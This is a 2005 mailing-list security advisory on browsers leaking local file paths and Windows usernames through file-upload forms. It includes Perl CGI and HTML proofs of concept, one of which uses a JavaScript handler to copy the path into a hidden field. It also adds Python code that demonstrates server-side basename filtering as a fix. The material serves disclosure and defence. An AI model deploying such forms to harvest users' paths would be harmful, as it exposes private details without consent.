Multi browser sensitive information disclosure
I. DESCRIPTION:
Mr. upken disclosed this issue publicly on 19 Feb. 2005. Here is his advisory (in Japanese): http://xxx.upken.jp/report/ieup/ I have a few additional details to add to his original advisory.
II. IMPACT:
Disclosure of sensitive information to an unauthorised user.
III. TECHNICAL DETAILS:
RFC1867 is the standard definition of the "Browse..." button that you use to upload files to a web server. It introduced the INPUT field type="file", which is that button, and also specified a multipart form encoding that can encapsulate files for upload along with all the other fields on an upload form.
As Mr. upken mentioned in his advisory, there is a weakness in "Form-based File Upload in HTML". "When we use Internet Explorer," he says, "secret or sensitive information can be exposed by malicious people."
I have tested some examples, and found that Firefox, Opera, and Internet Explorer have a weakness (tested on Windows XP SP2).
IV. Proof of Concept [A].
server-side Perl CGI (ask.cgi)
---------------------------
#!/usr/bin/perl
# Reads the raw multipart/form-data body from STDIN and echoes back the
# filename= parameter the browser sent for the "RFC1867" file field.
print "Content-Type: text/html\n\n";
die if $ENV{CONTENT_LENGTH} > 100*1024;
$objectname = "RFC1867";
# first line of the body is the part boundary
$boundary = <STDIN>;
$boundary =~ s/\r\n//;
while(<STDIN>){
    # the Content-Disposition line of the file part carries name= and filename=
    if($_ =~ /$objectname/){
        s/\r\n//;
        s/"//g;
        @dum = split(/filename=/, $_);
        # last element: the filename value (this assignment was mangled by the
        # list's address obfuscation in the original post; reconstructed here)
        $rfc1867 = $dum[@dum - 1];
    }
}
# Filtertxt works on a copy, so its return value must be assigned back
$rfc1867 = &Filtertxt( $rfc1867 );
print "$rfc1867\n";
exit(0);
sub Filtertxt {
    local( $ft ) = @_;
    # strip < > " ' % ; ) ( & + from the value before it is echoed into HTML
    $ft =~ s/[\<\>\"\'\%\;\)\(\&\+]//g;
    return( $ft ) ;
}
---------------------------
client-side FORM
---------------------------
<form name="XA" method="POST" enctype="multipart/form-data" action="http://example.com/cgi-bin/ask.cgi">
<input type="file" name="RFC1867">
<input type="hidden" name="XB" value="HIDDEN">
<input type=submit value="Upload">
</form>
---------------------------
NOTE: Method is "POST". When we upload a file, %USERNAME%, the path, etc. are disclosed. I guess that only IE has this weakness.
V. Proof of Concept [B].
server-side Perl CGI (named ask2.cgi)
---------------------------
#!/usr/bin/perl
if($ENV{'REQUEST_METHOD'} eq 'POST'){
    # reads input variables through POST
    read(STDIN, $buffer, $ENV{'CONTENT_LENGTH'});
}
else{
    # reads input variables through GET
    $buffer = $ENV{'QUERY_STRING'};
}
# splits the variables at &
@pairs = split(/&/, $buffer);
foreach $pair (@pairs) {
    # sets the value and name of each var
    ($name, $value) = split(/=/, $pair);
    # makes each + into a space
    $value =~ tr/+/ /;
    # URL decode
    $value =~ s/%([a-fA-F0-9][a-fA-F0-9])/pack("C", hex($1))/eg;
    # filter out bad characters < > " ' % ; ) ( & +
    $value = &Filtertxt( $value );
    # sets the variables in a hash
    $FORM{$name} = $value;
}
# print html
print "Content-Type: text/html\n";
print "\n";
print "$FORM{'XB'}\n";
print "<br>\n";
print "$FORM{'RFC1867'}\n";
exit(0);
sub Filtertxt {
    local( $ft ) = @_;
    $ft =~ s/[\<\>\"\'\%\;\)\(\&\+]//g;
    return( $ft ) ;
}
---------------------------
client-side FORM
---------------------------
<form name="XA" method="GET" enctype="multipart/form-data" action="http://example.com/cgi-bin/ask2.cgi">
<input type="file" name="RFC1867">
<input type="hidden" name="XB" value="HIDDEN">
<input type=submit value="Upload">
</form>
---------------------------
NOTE: Method is "GET". When we try to upload a file, %USERNAME%, the path, etc. are disclosed. I guess that both Opera and IE have this weakness.
V. Proof of Concept [C]. The server-side Perl CGI is the same as in Proof of Concept [B].
client-side FORM
---------------------------
<form name="XA" method="GET" enctype="multipart/form-data" action="http://example.com/cgi-bin/ask2.cgi">
<input type="file" name="RFC1867">
<input type="hidden" name="XB" value="HIDDEN">
<input type=submit value="Upload" onclick="document.XA.XB.value=document.XA.RFC1867.value;return true">
</form>
---------------------------
NOTE: Method is "GET". When we try to upload a file, %USERNAME%, the path, etc. are disclosed. I guess that Firefox, Opera and IE all have this weakness when evil JavaScript is used.
VI. Other browsers on other OSes: not tested. But......
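The three PoCs above differ only in where the browser places the file field's value: in the multipart filename= parameter (PoC [A]), in the GET query string (PoC [B]), or additionally copied into the hidden XB field by the onclick handler (PoC [C]). The following Python is an added example, not code from the original post: it parses constructed samples of each request shape the way ask.cgi and ask2.cgi do, shows which local directory components (drive, profile directory, %USERNAME%) arrive at the server, and implements the server-side handling a hardened upload script should apply, keeping only the final path component and never echoing the client-supplied path back. The boundary string, the user name "alice" and the file name are constructed sample values.

```python
import re
from urllib.parse import parse_qs

# Constructed sample data (not captured traffic): the requests the PoC forms
# above would produce for a user "alice" on Windows XP, with the full local
# path in the file field as Internet Explorer and Opera of that era sent it.
BOUNDARY = "---------------------------7d52e12650396"
CLIENT_PATH = "C:\\Documents and Settings\\alice\\Desktop\\report.txt"

# PoC [A]: POST, multipart/form-data (the RFC 1867 encoding)
MULTIPART_BODY = (
    f"--{BOUNDARY}\r\n"
    f'Content-Disposition: form-data; name="RFC1867"; filename="{CLIENT_PATH}"\r\n'
    "Content-Type: text/plain\r\n"
    "\r\n"
    "hello\r\n"
    f"--{BOUNDARY}\r\n"
    'Content-Disposition: form-data; name="XB"\r\n'
    "\r\n"
    "HIDDEN\r\n"
    f"--{BOUNDARY}--\r\n"
)
# PoC [B]: GET, so the browser ignores enctype and URL-encodes the file
# field's value into the query string.
QUERY_B = "RFC1867=C%3A%5CDocuments+and+Settings%5Calice%5CDesktop%5Creport.txt&XB=HIDDEN"
# PoC [C]: same, but the onclick handler copied the file field's value into XB.
QUERY_C = ("RFC1867=C%3A%5CDocuments+and+Settings%5Calice%5CDesktop%5Creport.txt"
           "&XB=C%3A%5CDocuments+and+Settings%5Calice%5CDesktop%5Creport.txt")


def parse_multipart(body: str, boundary: str) -> dict:
    """Minimal multipart/form-data parser: {field: {"filename": str|None, "data": str}}."""
    fields = {}
    for chunk in body.split(f"--{boundary}")[1:]:
        if chunk.startswith("--"):          # closing delimiter "--boundary--"
            break
        if chunk.startswith("\r\n"):
            chunk = chunk[2:]
        header_blob, _, data = chunk.partition("\r\n\r\n")
        if data.endswith("\r\n"):           # CRLF that precedes the next delimiter
            data = data[:-2]
        name = filename = None
        for line in header_blob.split("\r\n"):
            if line.lower().startswith("content-disposition:"):
                value = line.split(":", 1)[1]
                # "(?:^|;)" keeps name= from matching inside filename=
                m = re.search(r'(?:^|;)\s*name="([^"]*)"', value)
                name = m.group(1) if m else None
                m = re.search(r'filename="([^"]*)"', value)
                filename = m.group(1) if m else None
        if name is not None:
            fields[name] = {"filename": filename, "data": data}
    return fields


def filename_from_query(query_string: str, field: str) -> str:
    """Value of one field of a GET submission (PoC [B]/[C]); parse_qs URL-decodes."""
    return parse_qs(query_string).get(field, [""])[0]


def path_components(client_name: str) -> list:
    """Split on both Windows and POSIX separators."""
    return re.split(r"[\\/]", client_name)


def leaked_directory(client_name: str) -> list:
    """Everything but the last component: local directory structure (drive,
    profile directory, %USERNAME%) that the server had no need to receive."""
    return path_components(client_name)[:-1]


def safe_filename(client_name: str) -> str:
    """Server-side mitigation: keep only the final component and accept a
    conservative character set. Handles full paths (old IE/Opera), bare names
    (Firefox) and the C:\\fakepath\\ prefix modern browsers expose to script."""
    base = path_components(client_name)[-1].strip()
    if base in ("", ".", "..") or not re.fullmatch(r"[A-Za-z0-9._-]+", base):
        raise ValueError(f"rejected client filename: {client_name!r}")
    return base


def handle_upload(client_name: str) -> dict:
    """What a hardened ask.cgi should do with the client-supplied name: store
    only the basename and drop the rest instead of echoing it into the page."""
    return {"stored_as": safe_filename(client_name),
            "discarded": leaked_directory(client_name)}


if __name__ == "__main__":
    fields = parse_multipart(MULTIPART_BODY, BOUNDARY)
    print("PoC [A] filename as received:", fields["RFC1867"]["filename"])
    print("PoC [B] RFC1867 field       :", filename_from_query(QUERY_B, "RFC1867"))
    print("PoC [C] XB field            :", filename_from_query(QUERY_C, "XB"))
    print("hardened handling           :", handle_upload(CLIENT_PATH))
```

Run it as a script to see each PoC's received value next to the hardened result. The basename step is the server-side half of the fix; it cannot stop a browser from transmitting the path in the first place, which is why the workaround section below is about the client. Current browsers return only "C:\fakepath\<name>" from a file input's value property, which the same basename logic reduces to the bare name.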
VII. Is this a vulnerability?
Once I used Internet Explorer as an FTP tool. Today, while testing PoC [C], browsing for an upload file using Firefox, I found "MyNetwork - ftp02.websamba.com - mhtmlbug - scriptkitty.jpg" and uploaded it to another server. Then my monitor displayed C:\Documents and Settings\%USERNAME%\Local Settings\Temporary Internet Files\Content.IE5\YB6J6PY3\scriptkitty[4].jpg
Oh, no. YB6J6PY3! It does not matter. I guess this is NOT a vulnerability, maybe.
VIII. Workaround
Do not upload any file to an untrusted server. Do not attach any file (while sending webmail, posting to a mailing list, etc.). Use Firefox with JavaScript disabled.
VIII. Credit
Discovery: upken
Additional Research: bitlance winter
BEST REGARDS.
-- bitlance winter
_______________________________________________ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html
